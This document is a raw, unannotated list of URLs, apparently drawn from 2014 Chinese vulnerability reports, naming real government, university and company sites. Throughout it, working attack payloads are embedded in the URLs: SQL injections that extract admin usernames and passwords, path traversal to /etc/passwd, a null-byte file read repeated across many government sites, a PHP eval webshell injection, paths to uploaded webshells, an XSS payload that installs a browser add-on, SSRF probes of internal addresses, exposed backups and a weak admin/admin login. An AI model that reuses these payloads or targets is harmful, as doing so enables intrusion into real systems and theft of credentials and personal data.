http://dynamic.app.m.letv.com:80/android/dynamic.php?mod=audit&ctl=audit&act=indexv1&pcode=010510000&version=5.0 www.sdptest.qidian.com www.sdptest.minishua.com www.sdptest.shengpay.com http://www.eqmail.net/kehu.html http://stu.xjtu.edu.cn/ http://www.byecity.com/theme/themhandler.ashx?method=getProductList&ProductIDs=34594&t=0.5517011657357216 
http://www.byecity.com/theme/themhandler.ashx?method=getProductList&ProductIDs=34594&t=0.5517011657357216 http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685 http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685%20and%201=1 http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685%20and%201=2 http://pan.baidu.com/s/1i39hKNF http://shop.cnstock.com/gouwulist.aspx?Id=16 http://zhixing.court.gov.cn/ http://506srm.cofco.com/GetPassWord.aspx http://www.cpou.cn/wdsy!getIndex.action site:cpou.cn inurl:admin http://wrs.cpou.cn/ http://kids.damai.cn/KidsAjax.aspx http://appstest.baidu.com/ http://appstest.baidu.com/http/echoheader.php http://buv.me/index.php?do=api&id={projectId http://www.douban.com/thing/749/experience/1060633/ http://www.ctrip.com/member/signupcode.asp http://www.ctrip.com/member/signupcode.asp http://506srm.cofco.com/news/download.aspx?attid=121ebaf0-709e-461a-8e7f-0cf8ebe7372b&nid=2611 www.gzekt.com/YoukeAction_judgeBusiness.action http://123.139.154.175/admini/ http://zzmetro.cn/date.tgz http://zzmetro.cn/sysinfo.jsp,无任何访问控制,暴露很多系统信息 http://www.dl-hr.com/Silic.jsp http://www.cnpostair.com/dt.asp?xwclass=&page_no=1 http://www.cnpostair.com/dt.asp?xwclass=%EF%BF%BD%EF%BF%BD%D2%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.cnpostair.com/gl.asp?xwClass=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2 http://www.cnpostair.com/yw.asp?xwClass=%D2%B5%EF%BF%BD%EF%BF%BD%CE%A7 http://www.cnpostair.com/show_news1.asp https://openhome.alipay.com/doc/viewApiDoc.htm?name=alipay.micropay.order.freezepayurl.get&version=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\%252Fetc%252Fpasswd%2500&subVersion=1.0&packageCode=MICROPAY http://218.206.193.38/login.jsp http://www.yishion.com/media_in.php?id=15 http://m.114piaowu.com/usercenter/passwordInfo/ http://srm.lzlj.com.cn/app/pages/index.action 
http://www.shanghaimuseum.net/education/show/show-list?dateSelector=2014-03-01&keyword=%E6%B4%BB%E5%8A%A8%E6%90%9C%E7%B4%A2&seriesId=&pageNo=1 http://218.202.106.85/fee/fee.jsp http://www.hicourt.gov.cn/theory/artilce_list.asp?id=8025 http://mad.m.maxthon.cn/promotion/query.php?source_type=phone&channelid=610024630100&version_code=2866&country=CN&language=zh&dvc_id=5284047f4ffb4e04824a2fd1d1f0cd6275f80000&uid=&vname=4.1.8.2000 http://www.krd.csdb.cn/sjk.aspx?ID=1 http://www.krd.csdb.cn/iteminfo.aspx?Bh=5 http://www.krd.csdb.cn/newslist.aspx?Type=sjfw http://www.krd.csdb.cn/datalist.aspx?ID=269 http://www.krd.csdb.cn/datalist.aspx?db_ID=1 http://www.krd.csdb.cn/SysAdmin/login.aspx http://www.krd.csdb.cn/11.aspx http://www.krd.csdb.cn/1.aspx http://www.krd.csdb.cn/cmd.aspx http://genome.csdb.cn/cgi-bin/hgNear?org=human http://genome.csdb.cn/cgi-bin/hgTracks?org=human http://genome.csdb.cn/cgi-bin/hgVisiGene?org=human http://genome.csdb.cn/cgi-bin/hgBlat?org=human http://genome.csdb.cn/cgi-bin/hgGenome?org=human http://hp1997.com/include/SearchKey.aspx?wd=0zUhCt7R&_=1393137456995 http://www.micro.csdb.cn/newdb/search.php?db=xmtm&number=1 http://www.micro.csdb.cn/phpmyadmin/index.php http://wooyun.org/bugs/wooyun-2014-049391 http://paycenter.dooland.com/make_order.php?merc_no=M10001&merc_tranid=14022312213310958443&amt=1000&itemname=%E8%AF%BB%E8%A7%88%E5%A4%A9%E4%B8%8B%E5%85%85%E5%80%BC&itemdes=¬ify_url=http%3A%2F%2Fwww.dooland.com%2Fmagazine%2Fdoolandpay%2Fdoolandpay_notify.php%3Freturn_type%3D1%26orderid%3D14022312213310958443%26order_type%3D6&return_url=http%3A%2F%2Fwww.dooland.com%2Fmagazine%2Fdoolandpay%2Fdoolandpay_notify.php%3Freturn_type%3D0%26orderid%3D14022312213310958443%26order_type%3D6&merc_remark=useyu%3D0%26yuamt%3D0%26userid%3D10958443&sign=7794526d3a7ee97469640ff80dc2978d http://www.wechatpen.com/wxb/vipcard/ChangeVip.aspx?id=15 
http://www.wechatpen.com/api/app/card/UserInfo.aspx?sn=65e2c4b473b28c40397f7afc5ec2d07f&wid=332389&acid=10924&wxref=mp.weixin.qq.com&id=30517 http://maud.nau.edu.cn/admin/ http://zx.nau.edu.cn/news_view.asp?id=153 http://wap.yikuaiqu.com/weather.php?cityid=101280701&zone_id=13185 http://wap.yikuaiqu.com/product_list.php?theme_zone=7858 wap.yikuaiqu.com/photo.php?id=23333 http://61.190.8.240:6988/jcapp/login.do?method=begin http://61.190.8.240:6988 http://61.190.8.240:6988/admin/login.jsp http://web.7k7k.com http://web.7k7k.com/kefu/upload.php http://web.7k7k.com/uploads/user/201402/b7f99a1596a40732422bb5325a2980bd.pHp http://www.wechatpen.com/api/app/website/list.aspx?wid=332389&acid=10379&menu_id=145128,正常 http://www.wechatpen.com/api/app/website/detail.aspx?sn=&wid=332389&acid=%22&menu_id=145128&wxref=mp.weixin.qq.com,有惊喜 http://link.weather.com.cn/admin/index.php https://aq.qq.com/cn2/findpsw/pc/pc_find_pwd_input_account,输入QQ号码,再通过手机短信找回QQ登录密码 www.tenpay.com,快速登录到财付通 http://888.qq.com/promote/party/2013/1225_luck8/index.shtml http://888.qq.com/party/party_2013/flight_chess/flight_chess_send_tips.php?sendIds=1*****13 about:blank about:blank,只在标题栏上显示地址,加载完之后再替换 http://yhyc8.coolcamp.xdf.cn/ http://yhyc8.coolcamp.xdf.cn/log/2011.php encap:Ethernet B9:C1:62:CE b9ff:fec1:62ce/64 Scope:Link MTU:1500 packets:20406011513 dropped:5243688 packets:25380604005 http://128.B66.C131.D169:8090 http://www.ujipin.com/hello.php http://www.ujipin.com/images/shell.php http://www.ujipin.com/gift/zhucesongli/ http://www.rushncash.com.cn/huodong.php?pid=99999999 http://wap.dooland.com/index.php http://wap.dooland.com/index.php?verify=dGVzdGVyMTIzLTk2ZTc5MjE4OTY1ZWI3MmM5MmE1NDlkZDVhMzMwMTEy http://wap.dooland.com/b.php http://wap.dooland.com/b.php?id=9112&verify=dGVzdGVyMTIzLTk2ZTc5MjE4OTY1ZWI3MmM5MmE1NDlkZDVhMzMwMTEy http://support1.lenovo.com.cn/lenovo/wsi/station/servicestation/default.aspx?intcmp=GW 
http://support1.lenovo.com.cn/lenovo/wsi/station/servicestation/Api/SendSMS.ashx?num=手机号码&mess=短信内容&code=6559(此处验证码发送一次以后不会改变,所以可以一直使用) http://wap.dooland.com/login.php http://119.57.18.229/ http://wap.wissun.com/news-more.php?id=26 http://golf.cctv.com/e/extend/court/court_detail.php?courtid=23&hole=4 http://saf.hotpotpro.com/SAF/ http://wooyun.org/bugs/wooyun-2014-051919 http://www.hnldj.gov.cn/ http://www.hngwyj.gov.cn/ http://www.ccccah.cn/ http://www.yiyi-group.com/ http://www.xjjwhg.com/ http://www.hnldj.gov.cn/new/zwgk.php?class_id=115 http://www.hnldj.gov.cn/new/ztzl.php?class_id=3396 http://www.hnldj.gov.cn/new/News_Text.php?id=3709&class_id=168 http://www.hnldj.gov.cn/new/ztzl_Text.php?class_id=3396&id=801 http://www.hnldj.gov.cn/red/ztzl.php?class_id=3396 http://www.hnldj.gov.cn/red/gdzl.php?style=3&lanmu=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%A1%A2%CA%A1%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.hnldj.gov.cn/red/nmg.php?class_id=74 http://www.hnldj.gov.cn/red/zcgl.php?class_id=70 http://www.hnldj.gov.cn/red/ldjc.php?class_id=66 http://www.hnldj.gov.cn/red/zynl.php?class_id=62 http://www.hnldj.gov.cn/red/rlzy.php?class_id=34 http://www.hnldj.gov.cn/red/bszn.php?class_id=46 http://www.hnldj.gov.cn/red/jyzd.php?class_id=42 http://www.hnldj.gov.cn/red/zwgk.php?class_id=10 http://www.hnldj.gov.cn/red/shbx.php?class_id=38 http://www.hnldj.gov.cn/red/ztzl_text.php?id=799&class_id=3396 http://www.hngwyj.gov.cn/downfileclassify.php?classify=1 http://www.hngwyj.gov.cn/arccotent.php?id=1245 http://www.ccccah.cn/News_Text.php?id=95&class_id=112 http://www.ccccah.cn/gcyj.php?class_id=9 http://www.ccccah.cn/News_Text.php?class_id=13&id=699 http://www.yiyi-group.com/popbase.php?base_id=3356&id=18 http://www.yiyi-group.com/member_popbase.php?base_id=3245&id=43 http://www.yiyi-group.com/rlzy_popbase.php?id=47 http://www.yiyi-group.com/xmhz_popbase.php?base_id=3349&id=30 http://www.xjjwhg.com/model3.php?news_id=292 
http://www.xjjwhg.com/model2.php?category_id=2&category_value=10 http://english.forestry.gov.cn http://www.dam.com.cn/ http://fzb.serc.gov.cn http://www.12320.gov.cn/ http://sxxz.gov.cn/ http://www.ccat.net.cn/ http://www.hbinvest.gov.cn/ http://www.yjzjj.gov.cn/ http://www.tcrc.com.cn/ http://bztg.ahbz.gov.cn/ http://www.ytstc.gov.cn/ http://www.gzgtzy.gov.cn/ http://english.forestry.gov.cn/web/article.do?action=search http://english.forestry.gov.cn/web/article.do?action=pic&id=200911230845201784&type=1 http://english.forestry.gov.cn/web/article.do?action=readnew&id=201401210426516440 http://www.dam.com.cn/news/view.jsp?id=6405 http://www.dam.com.cn/news/list.jsp?bt=88952634&lb=88952634 http://www.dam.com.cn/travel/view.jsp?id=43 http://www.dam.com.cn/damView/view.jsp?id=1084 http://fzb.serc.gov.cn/about.aspx?id=09187559-3061-4e1b-bd3c-24e23de714c5 http://fzb.serc.gov.cn/gg_view.aspx?id= http://fzb.serc.gov.cn/news_view.aspx?id=a7026f37-d515-419a-9a33-4fde79b1c921 http://fzb.serc.gov.cn/zcfg_view.aspx?id=4b88f36d-c030-4812-a496-93d04a529fdd http://fzb.serc.gov.cn/wjgg_view.aspx?id=fa92d166-16e2-4615-bd64-1f84b1c971c3 http://fzb.serc.gov.cn/jgyj_view.aspx?id=bd2bb099-4fbe-4500-9e0d-0f16d207d0f0 http://fzb.serc.gov.cn/zt.aspx?id=ccd743a9-e985-4e43-a068-0fc9dcf263d5 http://fzb.serc.gov.cn/index.aspx http://fzb.serc.gov.cn/about.aspx?cid=fbf030da-151a-4095-a01a-e16f103c29d5 http://fzb.serc.gov.cn/jgyj.aspx?id=1061b74d-3287-4631-ba7b-36612ebd55aa http://fzb.serc.gov.cn/zcfg.aspx?id=6fdfd724-9ec3-4a34-8466-2bf3e43b466e http://fzb.serc.gov.cn/xzxk_view.aspx?id=d9b314fb-792b-4ba3-a19f-9f6ec32a32b3 http://fzb.serc.gov.cn/xzxk_list.aspx?id=b6c4a001-9a5b-437e-b297-0536fc9e96a6 http://fzb.serc.gov.cn/xzxk_list.aspx?cid=7eb0722b-f520-440a-a1c4-3ef8a240498b&id=9c0d9c3c-8939-4563-9b34-fd2266e35f2c http://fzb.serc.gov.cn/xzxk_list.aspx?cid=7eb0722b-f520-440a-a1c4-3ef8a240498b&id=9c0d9c3c-8939-4563-9b34-fd2266e35f2c 
http://fzb.serc.gov.cn/news.aspx?cid=c911328d-38d2-4562-b9c5-2f8882ddb2c0 http://fzb.serc.gov.cn/qzlx_view.aspx?id=7873b8cb-3a1a-4dbd-96f1-4907a317b350 http://fzb.serc.gov.cn/zt.aspx?sid=4b5386d2-1c63-47ac-b6b1-295e45e4cd43 http://www.12320.gov.cn/usoso/websiteTJ.jsp?id= http://www.sxxz.gov.cn/templet/show_xz.php?id=209 http://sxxz.gov.cn/templet/show_xz.php?id=174 http://www.sxxz.gov.cn/templet/lhzt/2012/display.php?id=16706 http://sxxz.gov.cn/templet/list_xz.php?page=1&pagesize=20 http://www.sxxz.gov.cn/vote/toupiaocount.php?id=9 http://www.ccat.net.cn/info/index.asp?strParentCode=news http://www.ccat.net.cn/certification/buddy_detail.asp?intID=1124 http://www.ccat.net.cn/info/detail.asp?strParentCode=news&strInfoTypeCode=news_87&intInfoID=1358 http://www.ccat.net.cn/organization/index2.asp?intOrgID=1 http://www.ccat.net.cn/corporation/list.asp?strInfoTypeCode=corporation_policy http://www.ccat.net.cn/corporation/detail.asp?strInfoTypeCode=corporation_policy&intID=1287 http://www.ccat.net.cn/info/list.asp?strParentCode=curriculum&strInfoTypeCode=curriculum_507 http://www.ccat.net.cn/corporation/detail.asp?strInfoTypeCode=corporation_policy&intID=1287 http://www.ccat.net.cn/info/list.asp?strParentCode=curriculum&strInfoTypeCode=curriculum_507 http://www.ccat.net.cn/organization/get_org_index_url.asp?strOrgName= http://www.ccat.net.cn/organization/intro.asp?intOrgID=1 http://www.ccat.net.cn/organization/list.asp?intOrgID=1&strCode=org_list2_1 http://www.ccat.net.cn/organization/featuredlinks.asp?intOrgID=1 http://www.ccat.net.cn/organization/detail.asp?intOrgID=1&strCode=org_news_1&intID=1038 http://www.ccat.net.cn/zscx/zscx.asp http://www.ccat.net.cn/info/detail.asp?strParentCode=news&strInfoTypeCode=news_87&intInfoID=1358 http://www.ccat.net.cn/info/login_check.asp http://www.ccat.net.cn/zscx/zscx.asp http://www.hbinvest.gov.cn/prws/investment/reg_Step1.aspx http://www.yjzjj.gov.cn/hf.php?zid=444 http://www.yjzjj.gov.cn/dcdb_index_info.php?id=84 
http://www.yjzjj.gov.cn/dcdb_index_list.php?page=1&find=&gjz= http://www.yjzjj.gov.cn/bxpt/search.php?st=0&sk=t&sd=d&sr=topics&sid=9b87931094abf9a1cdbc48deb19d5a23&search_id=unanswered http://www.tcrc.com.cn/Company/Jobs_Search_List.aspx?IndustryID=255&PositionID=255&JobsType=no&JobsKind=255&JobsCity=255&JobsExp=255&JobsLevel=255&JobsSex=255&ComNature=255&ComMemberNum=255&KeyWord=No&Pages=1&COMCONFIRMATION=1 http://bztg.ahbz.gov.cn/page/?content=%5B http://www.ytstc.gov.cn/msglist.aspx http://www.gzgtzy.gov.cn:83/zlml_Detail.aspx?id=1 http://www.gzgtzy.gov.cn:83/SysManLogin.aspx http://218.244.247.142/chinanews/ http://218.244.247.142/chinanews/conn.asp http://218.244.247.142/chinanews/system_manager/login.asp http://218.244.247.142/chinanews/review_list.asp?bookid=1204200009 http://www.lz.chinanews.com http://www.lz.chinanews.com/Newslist.aspx?ClassID=8 http://www.lz.chinanews.com/ShowToday.aspx?NewsID=5589 http://www.lz.chinanews.com/ShowEC.aspx?NewsID=5518 http://www.lz.chinanews.com/g.rar http://www.jyb.cn/digg/jsiframe.php?id=160 http://admin.ask.jyb.cn/ask.php?c=49,55,56,62,59,64,63,60,61 http://admin.ask.jyb.cn/Login.php http://gxsjk.jyb.cn/searchLqfs.html?province= http://admin.zhnews.net/vote/vote.php?ud_id=71 http://www.hebmz.gov.cn/next.jsp?ID=06 http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008 http://www.cba.gov.cn/cbastats/wcba/teamdetail.aspx?id=WTe004 http://www.cba.gov.cn/cbastats/wcba/calendarsearch.aspx?startshift=4&endshift=19&teamno=WTe004 http://www.jljl.lss.gov.cn/index.asp www.jljl.lss.gov.cn/ybcx.asp http://www.gdww.gov.cn/vote/result.php?VOTE_ID=14 http://www.gdofa.gov.cn/index.php/Search?kw=a http://www.hljzx.gov.cn/News/SearchList.aspx?S_ID=-1&CMD=a%27%20and%201=%28select%20substring%28%28select%20UserID,U_LoginName,U_Password%20from%20sys_User%20for%20xml%20auto%29,1,4000%29%29-- http://www.ccat.net.cn/certificates/ http://bbs.mca.gov.cn/showcommonposts.php?length=31&pagesize=7&fid=7 http://bbs.mca.gov.cn/showtopclicks.php?pagesize=7 
http://aqzj.chinasafety.gov.cn/zj/zjkp_disp.jsp?yhid=1 http://hk.we.jiepang.com/ http://www.baozouwushuang.com/index.php?c=news&m=get_news_by_id&id=193 http://golf.cctv.com/search.php http://www.mianxian.gov.cn/appeal/form.jsp?model_id=1 http://www.xiangshe.com/ http://tw.we.jiepang.com/ site:tianqitong.sina.cn http://tianqitong.sina.cn/bjl/ http://oa.sto.cn/e3oa/down/down.html http://wap.dooland.com/b.php http://wap.dooland.com/b.php?id=9112&verify=dGVzdGVyMTIzLTk2ZTc5MjE4OTY1ZWI3MmM5MmE1NDlkZDVhMzMwMTEy http://www.zijiqu.com/ http://www1.jiande.gov.cn/web/config.asp http://www1.jiande.gov.cn/web/ http://www1.jiande.gov.cn/web/CFCount/CounterPic/14/zf/0.html http://www.chinamengshan.com/admin/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiaGFjayBieSBweDE2MjQiKTwvc2NyaXB0Pg== site:wyn88.com http://vcas.wyn88.com:8085/ http://www1.wyn88.com/ http://www1.wyn88.com/admin/ http://we.wyn88.com/Account/ChangePassword?uName=admin http://mail.wyn88.com/ http://mail2.wyn88.com/ http://km.wyn88.com/vmain/login.jsp http://service.wyn88.com/COLBooking.asmx http://wifi.wyn88.com/wlan/ http://www.baidu.com/#wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E6%A0%A1%E6%97%A0%E5%BF%A7%E7%A7%91%E6%8A%80&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=1&rsv_sug4=88&inputT=0 http://www.google.co.in/search?newwindow=1&q=inurl%3AArticle.asp%3Fid%3D+%E6%A0%A1%E6%97%A0%E5%BF%A7%E7%A7%91%E6%8A%80&oq=inurl%3AArticle.asp%3Fid%3D+%E6%A0%A1%E6%97%A0%E5%BF%A7%E7%A7%91%E6%8A%80&gs_l=serp.12...20592744.20601689.0.20602648.3.3.0.0.0.0.310.430.0j1j0j1.2.0....0...1c.1.35.serp..3.0.0.aJksRrsk3e4 http://114.251.247.78:8100/jmx-console/ http://www.phpcms.cn/html/download/ http://lbs.189.cn/caches/bakup/default/phpcmstables_20121002_4005_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20121025_1622_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20121109_8080_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130111_8458_1.sql 
http://lbs.189.cn/caches/bakup/default/phpcmstables_20130310_2536_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130312_1791_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130312_9620_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130315_1614_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130409_2817_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130422_3301_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130607_8450_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130618_6409_1.sql http://e.dooland.com/ http://e.dooland.com Google:site:gov.cn inurl:law_artile.jsp http://yunnan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://jiangxi.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://hebei.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanghai.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://sichuan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://neimeng.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://www.jubao.gd.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://henan.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://anhui.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://heilongjiang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://tianjin.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://hubei.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://fujian.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://chongqing.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg 
http://shanxi.lvliang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.yangquan.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.jincheng.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.datong.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.jinzhong.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://guangxi.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://hunan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://xizang.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://haerbin.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://xinjiang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://202.99.197.93:8080 http://115.182.59.168:8081/ http://115.182.59.168:8080/.svn/entries http://115.182.59.168:8083/.svn/entries http://115.182.59.114:8081/.svn/entries http://www.sgzx.fx.edu.sh.cn/info_list.jsp?categoryId=04&pagination=1 http://www1.weiyu.sh.cn/po35/info_list.jsp?categoryId=08 http://www.hshsh.pudong-edu.sh.cn/info_list.jsp?categoryId=52&pagination=1 http://121.207.252.250:8081/ http://121.207.252.250:8081/.svn/entries http://bbs.siteserver.cn/ http://122.227.190.215/Login.aspx http://127.0.0.1/index.php?m=member&c=index&a=login zhushou360://type=apk&name=360安全助手&url=http://127.0.0.1/1.apk http://drops.wooyun.org/papers/548。 http://my.meishichina.com/ http://my.meishichina.com/pianfang/?q={${eval%28$_POST[c]%29 site:wx.qq.com http://bbs.pigai.org/blog-1617522-1254.html inurl:/riseapprove_web/secondPage/ http://bsdt.nantong.gov.cn/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=35&serviceType=2 http://58.221.172.27:9080/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=28&serviceType=2 
http://58.221.162.227:9080/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=30&serviceType=2 http://58.221.206.243:9080/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=2&serviceType=1 http://www.rdzw.gov.cn/rdzw_data/secondPage/burgherServiceDetail.do?sort_ID=7&serviceType=1 http://member.juran.com.cn http://www.oa169.com:97/ifrmae/enp/main.asp http://www.wyn88.com/promotion/listc1.html?area=Kbp3zJwh www.xunzai.com/android/index.php?ac=ajax&ct=count_form http://ot.wap.sogou.com/video/getjson.jsp?url=http://192.168.21.43/mod.php?mod=2013-11-07 http://ot.wap.sogou.com/video/getjson.jsp?url=http://192.168.21.43/mod.php?mod=2013-11-07 http://ot.wap.sogou.com/video/getjson.jsp?uID=XWc9M7DeeV27nmz0&url=http://10.12.10.155 inurl:celerityAlleywayDetail.do http://222.184.252.158:9080/riseapprove_web/secondPage/celerityAlleywayDetail.do?type=6&codeID=0001000146&nowPage=47 http://58.221.206.243:9080/riseapprove_web/secondPage/celerityAlleywayDetail.do?codeID=0001000147&type=1 http://zwdt.tz.gov.cn/riseapprove_web/secondPage/celerityAlleywayDetail.do?type=1&codeID=0001000147&nowPage=2 http://www.lyaudit.gov.cn/Contents.aspx?SerialNo=745 http://www.lyaudit.gov.cn/InfoMationList.aspx?TypeID=003011 http://uzblog.uz.taobao.com/imgdemo.php http://www.lenovo-ibm.net http://enfodesk.com/SMinisite/newinfo/search.html http://sports.letv.com/zt/workhard/index.shtml http://sports.m.letv.com/sports/login/auth http://ips.lenovo.com.cn/Login/CheckChangePassword http://222.82.232.227:9991/bscx!bjgs.action http://www.jhgs.gov.cn:9000/jdqy/jdqy_jdqyListXyxx.action http://122.224.75.235:7088/login/index.action http://www.sxxgsj.gov.cn:7001/w!wyzx.action?wshd.type=2 http://www.sygs.gov.cn:8888/syhd-jgwmg/jgwmg/detail.action?id=14299&channelId=8518&parid=8506 http://61.185.238.204:7001/enterNews.do http://221.12.117.248:8888/syhd-xxpt/cms/article_detail.action?newsId=13235&type=030001 http://www.zdsoft.net/moreinfo.aspx?layoutTemplateId=1201&bigClassId=266571 
http://220.197.220.60/desktop/login/login.action http://220.172.104.211/desktop/login/login.action http://oa.tyedu.com.cn/desktop/login/login.action http://oa.tyedu.com.cn/desktop/login/login.action为例,应该是三通两平台系统: http://61.130.145.181/webgps/Login.aspx www.anta.com/index.php正常访问。 www.anta.com/indeX.php提示文件不存在。 http://common.fj.sina.com.cn/index.php/201207hall/admin/index http://www.monstercable.com.cn/Admin/Index.Asp存在弱口令admin,admin,可导致进一步渗透,并泄露大量魔声注册用户信息。 http://121.14.39.216:9190/stat/ http://www.xfgjj.com http://www.xfgjj.com/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://www.xfgjj.com/rss.asp http://jc.cscec2b3c.com/index!loginout.do http://bid.elion.com.cn/index!loginout.do http://gcztb.zhongnangroup.cn:8381/index/tender/indexTender!queryBulletinPage.do http://hf.52xinyou.cn/do.html http://tieba.baidu.com/mo/q/checkurl?url=//www.google.com http://www.dooland.com/magazine/ReadStat http://www.zoomla.cn/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey Url:http://demo.zoomla.cn/Edit/ShowEdit.aspx?Dir=&OpenWords=TxtTagKey http://ideapad.it168.com/ http://productbbs.it168.com/ http://jiyouhui.it168.com/ http://photobbs.it168.com/ http://dell.benyouhui.it168.com/ http://b.it168.com/ http://benyouhui.it168.com/ http://lephone.it168.com/ http://sebbs.it168.com/ http://anycall.it168.com/ http://diybbs.it168.com/ http://oaweixiu.it168.com/ http://ce.it168.com/ http://acer.it168.com/ http://lepad.it168.com/ http://digital.it168.com/ http://security.jd.com///Public//userfile//201402//27100414_.jpg http://www.wyn88.com/roomstatus/tuangouroomlist?city4403&hotelid=fAF742SW&indate=2014-02-26&outDate=2014-02-27&v=0.4539814339950681&_=1393378750508 http://home.hangzhou.com.cn/ 
http://love.hangzhou.com.cn/ http://home.hangzhou.com.cn/pic.php?pic_id=1330176_6 http://home.hangzhou.com.cn/fit_demo.php?product_id=1334587_106 http://love.hangzhou.com.cn/index_User.aspx?Sex=%e7%94%b7 http://love.hangzhou.com.cn/Club_hd_hg_Content.aspx?id=94 http://love.hangzhou.com.cn/index.aspx http://211.65.227.4/lw/Login.aspx?ReturnUrl=%2flw%2fadmin%2fDefault.aspx http://extension.maxthon.cn/all/index.php?keyword=%22/%3E%3Cimg%20src=x%20onerror=%22external.mxCall%28%27InstallApp%27,%20%27http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon%27%29;%22/%3E http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon插件 http://api.cg.7k7k.com/contest/get_nearestplaylist.php?kk=2565412332&num=3 http://210.22.123.76:8081/uniportal/frame/welcome.action http://demo.taodiantong.com/?mod=ucp&do=order_details&order_id=1 http://www.jiongxiyou.cn/ display:none;”删除,可以达到利用汇率逻辑错误漏洞的目的。 ftp://ftp.founder.com.cn/incoming/ http://iphone.dooland.com/s.php?id=1958 http://www.hnahotelsandresorts.com http://www.hnahotelsandresorts.com/ajax/AjaxHandler.ashx POST:cmd=corder&id=123123123&name=adads http://www.csbidding.com/nhzb/infoListAction.do?show=law&outs=原来的页面应该是http://www.csbidding.com/nhzb/infoListAction.do?show=law&outs=outs去掉后罪名就进去了,那个页面可以编辑 http://www.csbidding.com/nhzb/infoListAction.do?show=law&outs= http://www.hnahotelsandresorts.com/destinations/review.aspx?orderid= http://www.hnahotelsandresorts.com/destinations/select.aspx?hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs http://member.jiuxian.com/pay_password.htm?step=2 http://member.jiuxian.com/chk_new_mob.htm http://111.13.55.55/webmanage/index.jsp http://univ1.zte.com.cn/XsExam/Application/ForePlatform/Exam_ErrorQestion_Analyse.aspx?examNo=55239&studentNO=20070910056177 http://eps.hikvision.com/custom/groupnewslist.aspx?GroupId=107&companyid=1 http://eps.hikvision.com/custom/groupnewslist.aspx?GroupId=107&companyid=3-2 
